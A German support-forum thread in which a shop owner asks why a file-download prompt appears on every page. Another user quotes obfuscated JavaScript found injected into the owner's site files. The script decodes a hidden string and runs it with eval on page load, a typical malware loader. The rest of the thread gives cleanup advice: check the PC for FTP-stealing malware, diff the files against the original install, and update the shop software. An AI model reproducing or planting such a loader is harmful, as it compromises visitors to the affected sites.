Meldung "Datei öffnen ..." erscheint plötzlich bei jedem Seitenzugriff

[Semper Talis]

Hilfe !

Folgende Meldung erscheint plötzlich beim Aufruf der Seite und aller Unterseiten !

Was ist das denn ??

Danke für Hinweise !!

Thomas

Linkback: https://www.modified-shop.org/forum/index.php?topic=26329.0

[ShopNix]

Hast Du eine abgespeichert?

Was steht drin?

[noRiddle (revilonetz)]

Das sieht nach XXS aus...

Gruß,
noRiddle

[Semper Talis]

Hast Du eine abgespeichert?

Was steht drin?

[Semper Talis]

Das sieht nach XXS aus...

Gruß,
noRiddle

Sorry, aber was ist XXS ?

[ShopNix]

Der Code am Ende Deiner Datei gehört da bestimmt nicht hin.

Hast Du Dir vielleicht einen Virus gefangen, der mittels FTP Deinen Server infiziert hat?

Code: Javascript  [Auswählen]

<script>
window.onload=function(){
        var gkaezwod=parseInt;
        qtpwk=document.getElementById("arxg").contentWindow.document.getElementById("ygvgp");
        vrfvmwm="";
        for(jchuin=0;jchuin<qtpwk.innerHTML.length;jchuin+=2)
                vrfvmwm+=String.fromCharCode(gkaezwod(qtpwk.innerHTML.substr(jchuin,2),28)-180);
        eval(vrfvmwm);
}
</script>

XXS kenne ich auch nicht, könnte aber XSS, also Cross Site Scripting gemeint sein.

[Semper Talis]

Hallo ShopNix,

danke für die Info. Habe in der Tat in den letzten Tagen einiges per FTP auf ein anderes Verzeichnis kopiert. Die Datei mit dem Code ist die, die bei Anwahl der Seite geöffnet werden will (also nix von mir).

Mir ist aufgefallen, dass meine index.php ein Änderungsdatum von gesten hat. Die hab' ich aber schon seit Monaten nicht mehr geändert.

Anbei die index.php

Danke !

[ShopNix]

Da werde ich Dir jetzt nicht viel weiterhelfen können. Wenn Du Dir eine Malware eingefangen hast, wirst Du suchen müssen.

Mit derlei Problemchen ist Unterstützung über Foren effektiv überfordert.

Deine index.php scheint aus einer alten xt:commerce Installation zu stammen. Wenn Du das Installationspaket noch hast, kannst Du versuchen, über diff oder ähnliches die Unterschiede zu ermitteln.

Andererseits fehlen Dir vermutlich eine ganze Menge upDates, und Du wirst ohnehin irgendwann in den sauren Apfel beißen müssen. Das wäre jetzt der geeignete Anlass.

[Semper Talis]

Ok, trotzdem besten Dank !!

[ShopNix]

Keine Ursache.

Du solltest übrigens bei der Suche auf Deinem PC anfangen. Die Website ist vermutlich nur eine Folgeerscheinung.

[noRiddle (revilonetz)]

XXS kenne ich auch nicht, könnte aber XSS, also Cross Site Scripting gemeint sein.

Sorry  , meinte natürlich XSS.

Gruß,
noRiddle